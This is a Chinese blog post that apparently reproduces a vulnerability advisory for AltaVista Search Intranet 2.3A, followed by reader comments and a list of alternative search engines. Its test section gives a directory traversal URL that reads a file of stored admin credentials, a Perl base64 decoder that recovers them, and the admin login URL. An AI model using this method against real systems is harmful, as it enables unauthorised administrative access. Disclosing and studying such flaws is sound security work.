`
teamo0812
  • 浏览: 118618 次
  • 性别: Icon_minigender_2
  • 来自: 成都
社区版块
存档分类
最新评论

AltaVista 搜索引擎目录遍历问题

阅读更多

受影响系统:

 

  AltaVista Search Intranet 2.3A

 

描述:

 

  AltaVista Search engine在9000端口开启了一个webserver,用来监听搜索请求.主要的搜索

 

  函数(cgi-bin/query)中有一个模板变量{mss},它将接受搜索请求中的包含的单个"../"字符

 

  串,提供对上一层目录('http')中所有文档的访问权限.

 

  这些文档可能包含很多管理信息,包括用来进行远程管理的用户名和口令.这些用户名和口令

 

  被base-64编码,可以很容易得被恢复成纯文本方式,因此攻击者可以获得远程管理这个搜索引

 

  擎的权力.

 

  < 发现者: rudi carell (rudicarell@HOTMAIL.COM) >

 

测试方法:

 

  警 告

 

  以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

 

  通过执行 http://target:9000/cgi-bin/query?../logs/mgtstate

 

  可以获得mgtstate文件的内容,这里面包含有远程管理的用户名和口令.

 

  利用下面的小程序就可以将其解码,得到用户名和口令:

 

  #!/usr/bin/perl

 

  use MIME::Base64;

 

  print decode_base64("$ARGV[0]"), "\n";

 

  然后执行 http://target:9000/cgi-bin/mgt

 

  输入得到的用户名和口令就可以远程管理该搜索引擎

5
4
分享到:
评论
4 楼 comsci 2010-03-13  
需要学习国外的其它搜索引擎的技术
3 楼 teamo0812 2010-03-12  

补充:十大另类搜索引擎(按照字数顺序排列)

1. ChaCha

ChaCha是一个人工搜索工具,可以用于日常搜索和手机搜索。ChaCha没有网站、没有搜索框、也没有页面链接。在美国只要你拨打1-800-2ChaCha (1-800-224-2242) 或者发短信到242242,就可以使用ChaCha。当你打电话时,像语音短信一样留下你的查询内容就可以了,然后挂掉电话。2-5分钟之内,人工向导会帮你查找结果,然后用短信告诉你答案。无论何时何种问题何种原因,使用任何手机,只要能发短信就行,

而且你只需要向运营商交纳短信费,ChaCha分文不收。

2. CoolIris / SearchMe / Viewzi

2008年是可视化搜索和iPhone交汇的一年。 可视化浏览正在不断成长,而Cooliris则正在引领这个趋势朝消费者喜欢的方向发展。 紧随其后的是SearchMe和Viewzi。这三个可视化搜索引擎可以在你的iPhone上显示流畅美丽的结果。

3. Faroo

Faroo将人们的搜索概念转了一个180度的弯儿:它不像Google那样花费数百万美元使用数千台服务器存储好几十亿网页,而是基于P2P(点对点)网络。Faroo通过会员的电脑将各个会员连在一起形成一个有机结构,并且不断增长,而不需要大量的服务器。

4. KallOut

使用KallOut进行搜索,你不需要输入文字,只要选中文本就可以了,然后KallOut就会在文字旁边提供搜索建议。

5. Kosmix

Kosmix 提供简报式的搜索结果,数据来源多种多样。既有文字、图片,又有音频和视频;既有来自大众网站的内容如eBay、YouTube和Wikipedia,也有其他专业网站的数据。

6. Mednar

Medar是一个健康医疗搜索引擎,提供非常全面的疾病信息。

7. Quintura

Quintura提供一个二维标签云,而不仅仅是一个列表,从而给你提供类似的关键词。

8. SeeqPod

SeeqPod是一个音乐搜索引擎,可以支持很多Windows Mobile操作系统的智能手机。

9. Surf Canyon

Surf Canyon 可以大幅改进你的搜索结果,实际上它可以观察你在做什么,没有做什么,你在点击什么,然后一旦它确定对你有用,会把后几页(比如说第八页)的相关结果告诉你。

10. Taggalaxy.de

Taggalaxy.de是一个德国研究生的课堂作业,没有任何使用说明。 但一旦你找到窍门儿,你得到不不只是一个另类搜索引擎,而是一个另类搜索星系!
2 楼 comsci 2010-03-12  
  AltaVista 是 美国的老牌搜索引擎了,资格好老哦

楼主可以出个系列,专门介绍非google系的搜索引擎的技术吗? 期待哦。。
1 楼 servce 2010-03-11  
有点没看懂

相关推荐

    Google及其它搜索引擎的高级使用

    这个过程包括三个主要步骤:首先,搜索引擎的爬虫程序遍历互联网,抓取各个网站的页面;其次,这些抓取的页面会被处理并建立索引,以便快速查找;最后,当用户输入查询时,搜索引擎会在索引数据库中进行匹配,并按照...

    搜索引擎营销破裂Search Engine Marketing Cracked

    搜索引擎分为多种类型,包括纯自动化的搜索引擎、人工编辑的目录、以及二者的混合体。文章提到了一些流行的搜索引擎,如Yahoo、Google、Inktomi、AltaVista和AOL Search等,并探讨了它们的特点和工作方式。同时,也...

    搜索引擎从入门到精通.pdf

    1. 基于蜘蛛程序的机器人搜索引擎,如AltaVista、Excite、Inktomi、FAST、Lycos、Google以及中国的百度和OpenFind。这类搜索引擎利用自动程序(蜘蛛)遍历Web,抓取网页内容并建立索引,然后根据用户查询返回结果。...

    搜索引擎及其发展浅析

    搜索引擎是互联网时代的重要产物,随着信息技术的迅猛发展,特别是互联网的普及与Web技术的进步,海量信息的产生使得信息检索成为了一个亟需解决的问题。搜索引擎作为信息检索的核心工具,不仅方便了用户在庞大的...

    快来看看“ 搜索引擎”的优化

    1. **第一代:手工的目录形式** - 这一时期的搜索引擎主要是人工编辑的目录,例如Yahoo!早期的形式,用户需浏览预分类的网站目录来找到所需信息。 2. **第二代:基于内容分析** - 开始分析网页内容,尤其是标题和...

    搜索引擎中Crawler的设计、实现与扩展优化

    搜索引擎的核心组成部分之一是Crawler(网络爬虫),它负责自动地遍历互联网,抓取网页并存储到搜索引擎的数据库中。Crawler的设计涉及到多个关键技术环节,包括URL管理、网页下载、内容解析以及抓取策略。 1. URL...

Global site tag (gtag.js) - Google Analytics